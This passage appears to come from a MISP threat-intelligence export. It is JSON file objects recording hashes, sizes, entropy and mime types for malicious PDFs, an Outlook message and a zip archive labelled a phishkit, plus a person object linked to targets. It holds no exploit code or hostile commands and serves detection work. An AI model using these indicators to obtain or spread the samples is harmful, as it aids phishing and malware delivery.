"uuid": "ae9ed01d-f3ad-478b-bb91-11298a40fbc1",
|
||
|
"value": "ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "f776b540-fcca-4c66-8893-edcdad7ff00b",
|
||
|
"value": "252891"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "entropy",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "float",
|
||
|
"uuid": "ee181244-ea41-4d2e-8a66-62177efaf432",
|
||
|
"value": "7.9916147992407"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "c16fc5e8-717e-49b3-99d5-5863cf055b3b",
|
||
|
"value": "08b49fb9882bfc8f69beb594fa543c8a"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "8ca900cc-de41-427d-a168-ac258161c011",
|
||
|
"value": "201e85d6bc519ecc6dece75b2586e761a56db6a7"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "ba93fe18-9b09-4267-a47c-b1397bc7500e",
|
||
|
"value": "ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha512",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "sha512",
|
||
|
"uuid": "f12e7b2f-5c8a-4137-9afb-e86acdbcd902",
|
||
|
"value": "b4a446c95e7239a3e491ee38e77ce8e1e96c27ca9c1cc25ca941643f366c62f81eb9942a1d80304bfc321c24cef86288f315bf97eb5f3738ad3618fbb6c86eb8"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "a8115929-5cfc-4282-be04-9652248f41e9",
|
||
|
"value": "ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73|08b49fb9882bfc8f69beb594fa543c8a"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "mimetype",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": false,
|
||
|
"type": "mime-type",
|
||
|
"uuid": "b9eecf42-8b42-4e3b-a36b-0dca3bf41f59",
|
||
|
"value": "PDF document, version 1.5"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ssdeep",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "ssdeep",
|
||
|
"uuid": "8f33dccc-dcf5-45d6-be03-5d5662490fff",
|
||
|
"value": "6144:mc67OzUcoXxC24wOOLDbjRC4xzE7mkHNw+4je6iMllT:mcNzxer4fiDbjRhGDH9Oe6Hl1"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558014309",
|
||
|
"uuid": "9b01cb2b-b6f7-433f-a91d-7b572e8324bd",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "9b01cb2b-b6f7-433f-a91d-7b572e8324bd",
|
||
|
"referenced_uuid": "c22ccebe-e72f-4b92-9c63-a196b4959c43",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a8-ed6c-4be4-999f-4158950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "9b01cb2b-b6f7-433f-a91d-7b572e8324bd",
|
||
|
"referenced_uuid": "5cdd683b-6530-4b0d-a8de-40c1950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd6965-cd78-4435-a186-4f0a950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "2fd88b37-70fd-48b6-b918-c1d29b69eb38",
|
||
|
"value": "0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "54ffcd31-7d98-47c1-839e-d42b9ed54acd",
|
||
|
"value": "447466"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "entropy",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "float",
|
||
|
"uuid": "3fecf7eb-28be-471d-a575-1076dc6a1dfb",
|
||
|
"value": "7.991595563552"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "98ef2711-7495-4299-923a-8b6380713a06",
|
||
|
"value": "1baa024f9cfab48b92c297aa406c91b5"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "6c35d0d1-89d9-4118-a8ae-17663754cfcf",
|
||
|
"value": "7d5a1dc90d535e3cc552d0db02841d28fb1ae773"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "a053b420-013d-4a22-bcf9-7adf561277b0",
|
||
|
"value": "0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha512",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "sha512",
|
||
|
"uuid": "6bd616bb-6010-41c8-b9f3-1c68921b40e5",
|
||
|
"value": "4137bd777e8167e964d3ebae98720cbf532cc0afac726522a668949dbc841150aa4aa600813142bb9ec6f999bd97ddd07b9bdf885034699305381382cfba6416"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "07f193f7-a908-4329-9e8a-5d1a6bd40e53",
|
||
|
"value": "0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132|1baa024f9cfab48b92c297aa406c91b5"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "mimetype",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": false,
|
||
|
"type": "mime-type",
|
||
|
"uuid": "0b0304f8-ab9e-4924-b6a1-b7291803ce22",
|
||
|
"value": "PDF document, version 1.5"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ssdeep",
|
||
|
"timestamp": "1558002049",
|
||
|
"to_ids": true,
|
||
|
"type": "ssdeep",
|
||
|
"uuid": "148d1bc6-d3dd-49ed-b3d1-c5cc30262a5d",
|
||
|
"value": "12288:Jn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3FM:Jn4iQUwQDkp6hdVM"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558014404",
|
||
|
"uuid": "06a84b03-0560-46ae-8570-1e7072a0b400",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "06a84b03-0560-46ae-8570-1e7072a0b400",
|
||
|
"referenced_uuid": "f5647ba0-86e7-40fa-92a2-7d0fe024a7c2",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a8-491c-4501-8732-49aa950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "06a84b03-0560-46ae-8570-1e7072a0b400",
|
||
|
"referenced_uuid": "5cdd63dc-0e48-4b97-bb9e-43ff950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd69c4-87a0-4200-ba88-4f2a950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "bc94e837-8569-47ba-a3c3-a02aebb103eb",
|
||
|
"value": "c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "3f3a29bb-f7ba-4fe5-8823-73432e467e81",
|
||
|
"value": "156088"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "entropy",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": false,
|
||
|
"type": "float",
|
||
|
"uuid": "c2b56f8b-f45f-4abf-b452-24e36ba56cf3",
|
||
|
"value": "7.9280918012902"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "2e505349-8cef-486b-b663-4402b68fb50f",
|
||
|
"value": "da877f4f7335264b03ac72fca5b305dc"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "3d519a57-9449-485d-b7ca-de88d71cbd4d",
|
||
|
"value": "435aa871cdd772072390d9baceaa8d832208d710"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "b31694d6-1a08-4521-9524-95da503b92f4",
|
||
|
"value": "c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha512",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": true,
|
||
|
"type": "sha512",
|
||
|
"uuid": "04ff64c4-bf4a-46db-add2-184108ce92de",
|
||
|
"value": "6ff7cb6507259bc322a8d400c34060d17e33483dab5b035d519447b2756a49da236acc54a413227168d7926ce758dfb169c8d92d58d2cc9b0c81cb6de383a1fd"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "5f3f86c7-bbf7-4237-9367-5a2323ad3106",
|
||
|
"value": "c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2|da877f4f7335264b03ac72fca5b305dc"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "mimetype",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": false,
|
||
|
"type": "mime-type",
|
||
|
"uuid": "a73530a3-b1a1-4dde-a59e-a0254334e7c7",
|
||
|
"value": "PDF document, version 1.7"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ssdeep",
|
||
|
"timestamp": "1558002050",
|
||
|
"to_ids": true,
|
||
|
"type": "ssdeep",
|
||
|
"uuid": "144713fb-cb60-4aad-8df0-27c4fc1554de",
|
||
|
"value": "3072:zr3i3ArGdqMW/5DsvvqTfAL3LKhMbgfGSL2YxPfmXfj:H3i3ASXQgvSA/K7XiYxG7"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558014495",
|
||
|
"uuid": "453258ef-0925-4471-9dcc-a06ab8038664",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "453258ef-0925-4471-9dcc-a06ab8038664",
|
||
|
"referenced_uuid": "d9bdc42c-191f-49a2-8cbe-2604f5462df6",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a8-6488-4fac-ad64-4c68950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "453258ef-0925-4471-9dcc-a06ab8038664",
|
||
|
"referenced_uuid": "5cdd683b-6530-4b0d-a8de-40c1950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd6a1f-b41c-449a-8342-4502950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "13bb957d-6f07-4439-a847-0a6b2508215c",
|
||
|
"value": "f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "026f11f4-03ec-4b2a-8bc8-0917c7f973cf",
|
||
|
"value": "485888"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "entropy",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": false,
|
||
|
"type": "float",
|
||
|
"uuid": "0787676c-4547-4e8a-b435-7c4fc9b56a4e",
|
||
|
"value": "7.9068746522467"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "0cd9671a-e2c6-4cf2-aca0-093dba80a02d",
|
||
|
"value": "b830fd2997e1f124f34d77ff1fa9b89e"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "78b64775-ba51-4fd4-b372-d2c20019e168",
|
||
|
"value": "ea43350c37e0c266c12d0fd53643cf94dd58c1f7"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "c59d71ff-6b93-4669-9ab0-c4d588ab40bf",
|
||
|
"value": "f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha512",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": true,
|
||
|
"type": "sha512",
|
||
|
"uuid": "968963e4-412e-415b-9d42-752c1132a4f8",
|
||
|
"value": "24a7f8c2e5d774554c69113b4b81a9755113db1ac620e0d9f0339919a0982e7c169446cb0fe4f3a9232f757a9ccd82676f55207cc044033e3485d1f22d965de1"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "fcdd1546-c165-4934-bca4-0f7224d7fa73",
|
||
|
"value": "f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a|b830fd2997e1f124f34d77ff1fa9b89e"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "mimetype",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": false,
|
||
|
"type": "mime-type",
|
||
|
"uuid": "63a26d57-f6e6-40f9-855e-8ea50014271a",
|
||
|
"value": "CDFV2 Microsoft Outlook Message"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ssdeep",
|
||
|
"timestamp": "1558002051",
|
||
|
"to_ids": true,
|
||
|
"type": "ssdeep",
|
||
|
"uuid": "ff15a2f4-029c-46cd-bc7c-42f97b51b7ea",
|
||
|
"value": "12288:Yn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3F:Yn4iQUwQDkp6hdV"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "Phishkit",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558014735",
|
||
|
"uuid": "5cdd5ff1-ed58-46d3-bed7-4bae950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd5ff1-ed58-46d3-bed7-4bae950d210f",
|
||
|
"referenced_uuid": "c3b36005-d35f-4540-bf78-cd09e2ac5e3d",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a9-7bf4-4105-b3b5-44f4950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd5ff1-ed58-46d3-bed7-4bae950d210f",
|
||
|
"referenced_uuid": "5cdd62fc-c898-42fb-ad4d-4aac950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd6a6b-f2fc-4706-b2b9-4b6b950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "5cdd5ff2-7094-4482-bff5-414e950d210f",
|
||
|
"value": "New-Updated-docs.zip|b7245bf657e792328aaacbc6f75d1555"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": false,
|
||
|
"type": "filename",
|
||
|
"uuid": "5cdd5ff2-fafc-4118-96bf-4ee1950d210f",
|
||
|
"value": "New-Updated-docs.zip"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "5cdd5ff2-8a60-4e75-9d34-4166950d210f",
|
||
|
"value": "b7245bf657e792328aaacbc6f75d1555"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "5cdd5ff2-7a30-4dd6-911d-4429950d210f",
|
||
|
"value": "bc32ff3213011db8278bfcd21b1dc432ded499d3"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "5cdd5ff2-8570-47ba-833d-4cba950d210f",
|
||
|
"value": "9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558014735",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "5cdd5ff2-23f4-47f6-865c-42f0950d210f",
|
||
|
"value": "3525231"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "file-encoding",
|
||
|
"timestamp": "1558014736",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd6b10-7f58-4ab6-918f-41c0950d210f",
|
||
|
"value": "Adobe-Standard-Encoding"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1558014736",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cdd6b10-3178-496d-a688-4aeb950d210f",
|
||
|
"value": "Malicious"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "An object which describes a person or an identity.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "person",
|
||
|
"template_uuid": "a15b0477-e9d1-4b9c-9546-abe78a4f4248",
|
||
|
"template_version": "9",
|
||
|
"timestamp": "1558014225",
|
||
|
"uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd5b25-5624-4404-b507-c170950d210f",
|
||
|
"relationship_type": "owner-of",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd61b1-6ba4-431f-ba4e-4649950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd62fc-c898-42fb-ad4d-4aac950d210f",
|
||
|
"relationship_type": "contained-within",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd6334-2694-4968-b0e7-4c59950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-ab44-4ab7-be4b-4aa1950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd63f3-643c-4933-8938-4ecb950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-0b30-404e-a1c4-4479950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd6408-6910-40e2-84fc-43bb950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-0e48-4b97-bb9e-43ff950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd642c-37d8-4c86-aab8-4f18950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cdd6190-8c08-46ef-b523-4da2950d210f",
|
||
|
"referenced_uuid": "5cdd63dc-713c-4eb6-adf5-4f3e950d210f",
|
||
|
"relationship_type": "targets",
|
||
|
"timestamp": "1621850123",
|
||
|
"uuid": "5cdd644c-4954-4a77-b04c-478e950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
